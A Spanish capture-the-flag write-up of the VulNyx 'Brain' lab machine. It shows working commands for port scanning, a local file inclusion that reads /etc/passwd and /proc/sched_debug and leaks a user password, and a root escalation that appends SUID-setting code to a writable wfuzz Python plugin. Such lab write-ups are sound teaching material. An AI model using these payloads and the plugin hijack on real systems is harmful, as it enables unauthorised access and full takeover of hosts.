cd ~/blog

~/writeups/vulnyx/04-brain.md

04 - Brain

easy Linux vulnyx 11-02-2025
Local File Inclusion (LFI)Credential leak via /proc/sched_debugsudo wfuzz Python plugin hijack
vulnyx.com

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.93
 nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.93
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-11 11:26 -03
Nmap scan report for 192.168.1.93
Host is up (0.00031s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 32:95:f9:20:44:d7:a1:d1:80:a8:d6:95:91:d5:1e:da (RSA)
|   256 07:e7:24:38:1d:64:f6:88:9a:71:23:79:b8:d8:e6:57 (ECDSA)
|_  256 58:a6:da:1e:0f:89:42:2b:ba:de:00:fc:71:78:3d:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

El sitio muestra una salida de sched_debug (el planificador del kernel), lo que sugiere que la página incluye contenido de archivos del sistema:

 curl http://192.168.1.93/index.php
<pre>
runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1      2927.102286      1731   120         0.000000       509.025216         0.000000 0 0 /
</pre>

Fuzzeamos el parámetro de inclusión en busca de un LFI y damos con include:

 ffuf -u 'http://192.168.1.93/index.php?FUZZ=../../../../../../../../../../../../../etc/passwd' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 361
...
include                 [Status: 200, Size: 1750, Words: 125, Lines: 34, Duration: 3ms]
...

 curl 'http://192.168.1.93/index.php?include=/etc/passwd'
...
root:x:0:0:root:/root:/bin/bash
ben:x:1000:1000:ben,,,:/home/ben:/bin/bash
...

Aprovechando el LFI, leemos /proc/sched_debug (que lista los procesos y sus argumentos), donde se filtran las credenciales del usuario ben:

 curl 'http://192.168.1.93/index.php?include=/proc/sched_debug' | grep ben
...
100 16041    0 16041     S    ben:B3nP4zz   401      1692.820161        52   120         0.000000         2.308689         0.000000 0 0 /
...

Nos logueamos por SSH con esas credenciales y obtenemos la primera flag:

 ssh ben@192.168.1.93
The authenticity of host '192.168.1.93 (192.168.1.93)' can't be established.
ED25519 key fingerprint is SHA256:fkqq58u/sGpESMAWndC860Dp3sVGoKVkrQdlahLQV5A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.93' (ED25519) to the list of known hosts.
ben@192.168.1.93's password:
Linux brain 4.19.0-23-amd64 #1 SMP Debian 4.19.269-1 (2022-12-20) x86_64
ben@brain:~$

Para escalar privilegios, revisamos los permisos sudo:

ben@brain:~$ sudo -l
Matching Defaults entries for ben on Brain:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ben may run the following commands on Brain:
    (root) NOPASSWD: /usr/bin/wfuzz

Podemos ejecutar wfuzz como root. Buscamos si tenemos escritura sobre alguna de sus dependencias Python (library hijacking):

ben@brain:~$ find / -writable 2>/dev/null |grep "wfuzz"
...
/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
...

El plugin range.py es escribible, así que le añadimos código que asigne el bit SUID a Bash (se ejecutará como root al invocar wfuzz):

ben@brain:~$ echo 'import subprocess' >> /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
ben@brain:~$ echo 'subprocess.run(["sudo", "chmod", "u+s", "/bin/bash"], check=True)' >> /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py

Ejecutamos wfuzz usando el payload range para disparar el código y, con Bash ya SUID, lanzamos una shell de root:

ben@brain:~$ sudo /usr/bin/wfuzz -c -z range 1-2
ben@brain:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1168776 abr 18  2019 /bin/bash

ben@brain:~$ bash -p
bash-5.0# whoami
root

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados